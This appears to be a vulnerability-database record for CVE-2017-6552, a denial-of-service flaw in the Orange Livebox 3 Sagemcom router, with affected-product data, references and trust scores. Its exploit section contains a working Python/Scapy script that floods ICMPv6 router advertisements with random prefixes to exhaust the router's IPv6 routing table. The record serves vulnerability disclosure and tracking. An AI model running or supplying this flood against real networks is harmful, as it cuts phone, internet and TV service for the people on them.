ID

VAR-E-201703-0156


CVE

cve_id:CVE-2017-6552

Trust: 1.8

sources: BID: 96827 // PACKETSTORM: 141525 // EXPLOIT-DB: 41565

EDB ID

41565


TITLE

Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 - Denial of Service - Hardware dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 41565

DESCRIPTION

Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 - Denial of Service. CVE-2017-6552 . dos exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 41565

AFFECTED PRODUCTS

vendor:liveboxmodel:sagemcom sg30 sip-fr-5.15.8.1scope:eqversion:3

Trust: 2.1

vendor:orangemodel:livebox sagemcom sg30 sip-fr-5.15.8.1scope:eqversion:3

Trust: 0.3

sources: BID: 96827 // PACKETSTORM: 141525 // EXPLOIT-DB: 41565 // EDBNET: 91776

EXPLOIT

#!/usr/bin/python

# Exploit Title: CVE-2017-6552 - Local DoS Buffer Overflow Livebox 3
# Date: 09/03/2017
# Exploit Author: Quentin Olagne
# Vendor Homepage: http://www.orange.fr/
# Version: SG30_sip-fr-5.15.8.1
# Tested on: Livebox 3 - Sagemcom
# CVE : CVE-2017-6552

'''
Livebox router has its default IPv6 routing table max. size too
small and therefore can be filled within minutes.
An attacker can exploit this issue to render the affected system
unresponsive, resulting in a denial-of-service condition for Phone,
Internet and TV services.

Vulenrability has been discovered in April '16 and has been patched some time ago with the newest firmware.
I have submitted the idea to have a button to enable/disable IPv6 stack on the local interface from the admin
livebox web UI, don't know if it's been implemented.

'''

from scapy.all import *
import time
import threading

start_time = time.time()

def printit():
threading.Timer(5.0, printit).start()
interval = time.time() - start_time
print 'Total time in seconds:', interval, '\n'

printit()

packet = Ether() \
/IPv6() \
/ICMPv6ND_RA() \
/ICMPv6NDOptPrefixInfo(prefix=RandIP6(),prefixlen=64) \
/ICMPv6NDOptSrcLLAddr(lladdr=RandMAC("00:01:42"))

try:
sendp(packet,loop=1)
except KeyboardInterrupt:
stored_exception=sys.exc_info()
except:
pass

print "Goodbye"

Trust: 1.0

sources: EXPLOIT-DB: 41565

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 41565

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 41565

TYPE

Denial of Service

Trust: 1.6

sources: EXPLOIT-DB: 41565 // EDBNET: 91776

TAGS

tag:exploit

Trust: 0.5

tag:denial of service

Trust: 0.5

tag:overflow

Trust: 0.5

sources: PACKETSTORM: 141525

CREDITS

Quentin Olagne

Trust: 0.6

sources: EXPLOIT-DB: 41565

EXTERNAL IDS

db:NVDid:CVE-2017-6552

Trust: 1.8

db:EXPLOIT-DBid:41565

Trust: 1.6

db:EDBNETid:91776

Trust: 0.6

db:PACKETSTORMid:141525

Trust: 0.5

db:BIDid:96827

Trust: 0.3

sources: BID: 96827 // PACKETSTORM: 141525 // EXPLOIT-DB: 41565 // EDBNET: 91776

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2017-6552

Trust: 1.5

url:https://www.exploit-db.com/exploits/41565/

Trust: 0.6

url:http://www.orange.fr/portail

Trust: 0.3

sources: BID: 96827 // PACKETSTORM: 141525 // EXPLOIT-DB: 41565 // EDBNET: 91776

SOURCES

db:BIDid:96827
db:PACKETSTORMid:141525
db:EXPLOIT-DBid:41565
db:EDBNETid:91776

LAST UPDATE DATE

2022-07-27T10:00:42.338000+00:00


SOURCES UPDATE DATE

db:BIDid:96827date:2017-03-16T00:02:00

SOURCES RELEASE DATE

db:BIDid:96827date:2017-03-09T00:00:00
db:PACKETSTORMid:141525date:2017-03-09T16:40:43
db:EXPLOIT-DBid:41565date:2017-03-09T00:00:00
db:EDBNETid:91776date:2017-03-09T00:00:00